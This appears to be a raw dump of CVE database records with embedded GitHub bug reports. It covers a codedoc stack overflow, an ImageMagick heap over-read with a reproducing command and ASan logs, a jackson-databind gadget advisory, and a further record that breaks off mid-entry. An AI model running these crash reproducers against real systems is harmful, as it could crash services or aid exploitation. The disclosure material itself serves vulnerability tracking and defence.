[ "787" ]
787
https://github.com/michaelrsweet/codedoc/issues/5
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "michaelrsweet", "codedoc" ]
root@ubuntu:/home/tim/fuzz/codedoc# ./codedoc poc2 [poc2.zip](https://github.com/michaelrsweet/codedoc/files/3353963/poc2.zip) asan output ``` ================================================================= ==29166==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffffffddc40 at pc 0x7ffff6e94d82 bp 0x7ffffffd9b70 sp 0x7ffffffd9318 WRITE of size 1 at 0x7ffffffddc40 thread T0 #0 0x7ffff6e94d81 in __interceptor_memmove (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x7ad81) #1 0x555555567c6e in memmove /usr/include/x86_64-linux-gnu/bits/string_fortified.h:40 #2 0x555555567c6e in codedoc_strlcpy /home/tim/codedoc-addr/codedoc.c:144 #3 0x555555567e8c in add_variable /home/tim/codedoc-addr/codedoc.c:860 #4 0x55555556d103 in scan_file /home/tim/codedoc-addr/codedoc.c:3591 #5 0x555555566b56 in main /home/tim/codedoc-addr/codedoc.c:488 #6 0x7ffff660eb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #7 0x5555555675e9 in _start (/home/tim/fuzz/codedoc/codedoc-addr+0x135e9) Address 0x7ffffffddc40 is located in stack of thread T0 at offset 16480 in frame #0 0x555555567cb0 in add_variable /home/tim/codedoc-addr/codedoc.c:810 This frame has 2 object(s): [32, 36) 'whitespace' [96, 16480) 'buffer' <== Memory access at offset 16480 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x7ad81) in __interceptor_memmove Shadow bytes around the buggy address: 0x10007fff3b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff3b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff3b50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff3b60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff3b70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x10007fff3b80: 00 00 00 00 00 00 00 00[f3]f3 f3 f3 00 00 00 00 0x10007fff3b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff3ba0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 04 f2 f2 f2 0x10007fff3bb0: f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff3bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x10007fff3bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==29166==ABORTING ``` gdb output ``` *** stack smashing detected ***: <unknown> terminated Program received signal SIGABRT, Aborted. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x7ffffffd9bd0 --> 0x0 RCX: 0x7ffff75e6e97 (<__GI_raise+199>: mov rcx,QWORD PTR [rsp+0x108]) RDX: 0x0 RSI: 0x7ffffffd9930 --> 0x0 RDI: 0x2 RBP: 0x7ffffffd9d60 --> 0x7ffff775e97e ("<unknown>") RSP: 0x7ffffffd9930 --> 0x0 RIP: 0x7ffff75e6e97 (<__GI_raise+199>: mov rcx,QWORD PTR [rsp+0x108]) R8 : 0x0 R9 : 0x7ffffffd9930 --> 0x0 R10: 0x8 R11: 0x246 R12: 0x7ffffffd9bd0 --> 0x0 R13: 0x1000 R14: 0x0 R15: 0x30 ('0') EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ffff75e6e8b <__GI_raise+187>: mov edi,0x2 0x7ffff75e6e90 <__GI_raise+192>: mov eax,0xe 0x7ffff75e6e95 <__GI_raise+197>: syscall => 0x7ffff75e6e97 <__GI_raise+199>: mov rcx,QWORD PTR [rsp+0x108] 0x7ffff75e6e9f <__GI_raise+207>: xor rcx,QWORD PTR fs:0x28 0x7ffff75e6ea8 <__GI_raise+216>: mov eax,r8d 0x7ffff75e6eab <__GI_raise+219>: jne 0x7ffff75e6ecc <__GI_raise+252> 0x7ffff75e6ead <__GI_raise+221>: add rsp,0x118 [------------------------------------stack-------------------------------------] 0000| 0x7ffffffd9930 --> 0x0 0008| 0x7ffffffd9938 --> 0x0 0016| 0x7ffffffd9940 --> 0x0 0024| 0x7ffffffd9948 --> 0x0 0032| 0x7ffffffd9950 --> 0x0 0040| 0x7ffffffd9958 --> 0x0 0048| 0x7ffffffd9960 --> 0x0 0056| 0x7ffffffd9968 --> 0x0 [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGABRT __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 51 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. gdb-peda$ bt #0 __GI_raise (sig=sig@entry=0x6) at ../sysdeps/unix/sysv/linux/raise.c:51 #1 0x00007ffff75e8801 in __GI_abort () at abort.c:79 #2 0x00007ffff7631897 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff775e988 "*** %s ***: %s terminated\n") at ../sysdeps/posix/libc_fatal.c:181 #3 0x00007ffff76dccd1 in __GI___fortify_fail_abort (need_backtrace=need_backtrace@entry=0x0, msg=msg@entry=0x7ffff775e966 "stack smashing detected") at fortify_fail.c:33 #4 0x00007ffff76dcc92 in __stack_chk_fail () at stack_chk_fail.c:29 #5 0x0000555555558602 in add_variable (parent=<optimized out>, name=<optimized out>, type=<optimized out>) at codedoc.c:930 #6 0x000055555555b95e in scan_file (file=<optimized out>, tree=<optimized out>) at codedoc.c:3591 #7 0x00005555555577d6 in main (argc=argc@entry=0x2, argv=argv@entry=0x7fffffffe098) at codedoc.c:488 #8 0x00007ffff75c9b97 in __libc_start_main (main=0x555555557239 <main>, argc=0x2, argv=0x7fffffffe098, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe088) at ../csu/libc-start.c:310 #9 0x0000555555557dfa in _start () gdb-peda$ ```
stack-buffer-overflow in codedoc_strlcpy codedoc.c:144
https://api.github.com/repos/michaelrsweet/codedoc/issues/5/comments
1
2019-07-03T08:29:50Z
2019-07-03T14:50:43Z
https://github.com/michaelrsweet/codedoc/issues/5
463,615,900
5
504
CVE-2019-13391
2019-07-07T22:15:10.503
In ImageMagick 7.0.8-50 Q16, ComplexImages in MagickCore/fourier.c has a heap-based buffer over-read because of incorrect calls to GetCacheViewVirtualPixels.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/7c2c5ba5b8e3a0b2b82f56c71dfab74ed4006df7" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1588" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/f6ffc702c6eecd963587273a429dcd608c648984" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00007.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/7c2c5ba5b8e3a0b2b82f56c71dfab74ed4006df7" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1588" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/f6ffc702c6eecd963587273a429dcd608c648984" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00007.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://usn.ubuntu.com/4192-1/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*", "matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/ImageMagick/ImageMagick/issues/1588
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a heap buffer overflow in MagickCore/fourier.c:314:19 in .omp_outlined._debug__ Heap buffer overflow sometimes occur. To trigger this bug, please run the command for several times. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run cmd: `magick "-seed" "0" "-black-point-compensation" "-fuzz" "238" "(" "magick:logo" "-normalize" "-cycle" "615" ")" "(" "magick:rose" "-gaussian-blur" "4" ")" "(" "magick:granite" "-convolve" "207,117,126,202,52,59,196,21,46,216,32,49,172,14,116,115,203,20,219,21,194,58,155,117,148,208,229,218,151,151,171,239,212,207,77,212,81,32,23,137,63,164,67,85,47,13,85,96,85,86,244,168,218,41,98,108,208,221,77,5,45,117,102,5,89,150,47,36,214,0,20,255,14,83,77,191,109,40,32,245,112" ")" "-strokewidth" "58" "-complex" "subtract" "-layers" "compare-overlay" "" ` ASAN log about heap buffer over-flow. ``` ==18953==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000020200 at pc 0x0000014f4b4e bp 0x7fa64464bc30 sp 0x7fa64464bc28 READ of size 4 at 0x619000020200 thread T2 #0 0x14f4b4d in .omp_outlined._debug__ MagickCore/fourier.c:314:19 #1 0x14f56cc in .omp_outlined. MagickCore/fourier.c:231:3 #2 0x7fa64f983452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452) #3 0x7fa64f93d1b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6) #4 0x7fa64f93bb20 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x34b20) #5 0x7fa64f97b417 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x74417) #6 0x7fa651fb76da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da) #7 0x7fa64f41f88e in clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e) 0x619000020200 is located 0 bytes to the right of 896-byte region [0x61900001fe80,0x619000020200) allocated by thread T2 here: #0 0x4f09b0 in __interceptor_posix_memalign (install/bin/magick+0x4f09b0) #1 0x5822fa in AcquireAlignedMemory MagickCore/memory.c:265:7 #2 0xb24539 in AcquireCacheNexusPixels MagickCore/cache.c:4968:37 #3 0xb0d587 in SetPixelCacheNexusPixels MagickCore/cache.c:5076:12 #4 0xb04b7c in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10 #5 0xb28621 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10 #6 0x14f2984 in .omp_outlined._debug__ MagickCore/fourier.c:249:8 #7 0x14f56cc in .omp_outlined. MagickCore/fourier.c:231:3 #8 0x7fa64f983452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452) #9 0x7fa64f93d1b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6) Thread T2 created by T0 here: #0 0x43fcd0 in pthread_create (install/bin/magick+0x43fcd0) #1 0x7fa64f979110 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x72110) SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/fourier.c:314:19 in .omp_outlined._debug__ ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-10 - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 <!-- Thanks for reporting the issue to ImageMagick! -->
heap-buffer-overflow in MagickCore/fourier.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1588/comments
7
2019-06-11T03:25:05Z
2019-07-08T01:55:44Z
https://github.com/ImageMagick/ImageMagick/issues/1588
454,462,914
1,588
505
CVE-2018-11307
2019-07-09T16:15:12.807
An issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.5. Use of Jackson default typing along with a gadget class from iBatis allows exfiltration of content. Fixed in 2.7.9.4, 2.8.11.2, and 2.9.6.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:2804" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3002" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2032" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.apache.org/thread.html/7fcf88aff0d1deaa5c3c7be8d58c05ad7ad5da94b59065d8e7c50c5d%40%3Cissues.lucene.apache.org%3E" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "US Government Resource" ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7525" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:1823" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:2804" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3002" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2032" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.apache.org/thread.html/7fcf88aff0d1deaa5c3c7be8d58c05ad7ad5da94b59065d8e7c50c5d%40%3Cissues.lucene.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "US Government Resource" ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-7525" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "7036DA13-110D-40B3-8494-E361BBF4AFCD", "versionEndExcluding": "2.6.7.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "44F16CE8-7CAD-4846-A38E-8192D56AB09B", "versionEndExcluding": "2.7.9.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.7.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "02EA57F3-507D-4E70-BA77-D235A59C2800", "versionEndExcluding": "2.8.11.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.8.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "429C17F2-AB58-4BC0-8EB0-AF3322DDD528", "versionEndExcluding": "2.9.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:3.11:*:*:*:*:*:*:*", "matchCriteriaId": "2F87326E-0B56-4356-A889-73D026DB1D4B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.1:*:*:*:*:*:*:*", "matchCriteriaId": "064E7BDD-4EF0-4A0D-A38D-8C75BAFEDCEF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:clusterware:12.1.0.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "6C9084DB-329E-403F-8D0A-5B9F53183714", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "9615B3B8-B176-4359-97B5-D2E2FEE5BFEA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", "matchCriteriaId": "F6455EB1-C741-45E8-A53E-E7AD7A5D00EE", "versionEndExcluding": "11.2.0.3.23", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", "matchCriteriaId": "BFD43191-E67F-4D1B-967B-3C7B20331945", "versionEndExcluding": "12.2.0.1.19", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "12.2.0.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:global_lifecycle_management_opatch:*:*:*:*:*:*:*:*", "matchCriteriaId": "062C588A-CBBA-470F-8D11-2F961922E927", "versionEndExcluding": "13.9.4.2.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "13.9.4.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:17.0:*:*:*:*:*:*:*", "matchCriteriaId": "A7FBF5C7-EC73-4CE4-8CB7-E9CF5705DB25", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:utilities_advanced_spatial_and_operational_analytics:2.7.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "6FD0EC40-B96B-4E9C-9A81-4E65C4B9512E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2032
[ "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
A new potential gadget type from MyBatis (https://github.com/mybatis/mybatis-3) has been reported. It may allow content exfiltration (remote access by sending contents over ftp) when untrusted content is deserialized with default typing enabled. See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem. Mitre id: CVE-2018-11307 Original vulnerability discoverer: 吴桂雄 Wuguixiong Fixed in * 2.9.5 and later * 2.8.11.2 * 2.7.9.4 * 2.6.7.3
Block one more gadget type (mybatis, CVE-2018-11307)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2032/comments
4
2018-05-10T04:23:03Z
2020-12-02T04:03:22Z
https://github.com/FasterXML/jackson-databind/issues/2032
321,805,044
2,032
506
CVE-2019-13454
2019-07-09T17:15:11.850
ImageMagick 7.0.8-54 Q16 allows Division by Zero in RemoveDuplicateLayers in MagickCore/layer.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", 